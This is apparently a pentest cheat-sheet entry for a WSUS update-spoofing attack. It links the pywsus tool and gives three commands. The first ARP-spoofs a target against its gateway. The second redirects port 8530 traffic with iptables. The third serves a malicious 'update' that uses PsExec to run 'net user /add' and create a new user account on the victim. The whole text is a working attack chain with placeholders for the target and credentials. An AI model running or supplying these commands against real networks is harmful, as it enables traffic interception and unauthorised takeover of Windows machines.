https://github.com/GoSecure/pywsus
arpspoof -i <interface> -t <rhost> -r <gatewayIp>
iptables -t nat -I PREROUTING -i <interface> -p tcp --dport 8530 -j REDIRECT --to-port 8530
python3 pywsus.py -H <lhost> -p 8530 -e <psexecExeFile> -c '/accepteula /s cmd.exe /c "net user /add <user> <password>"'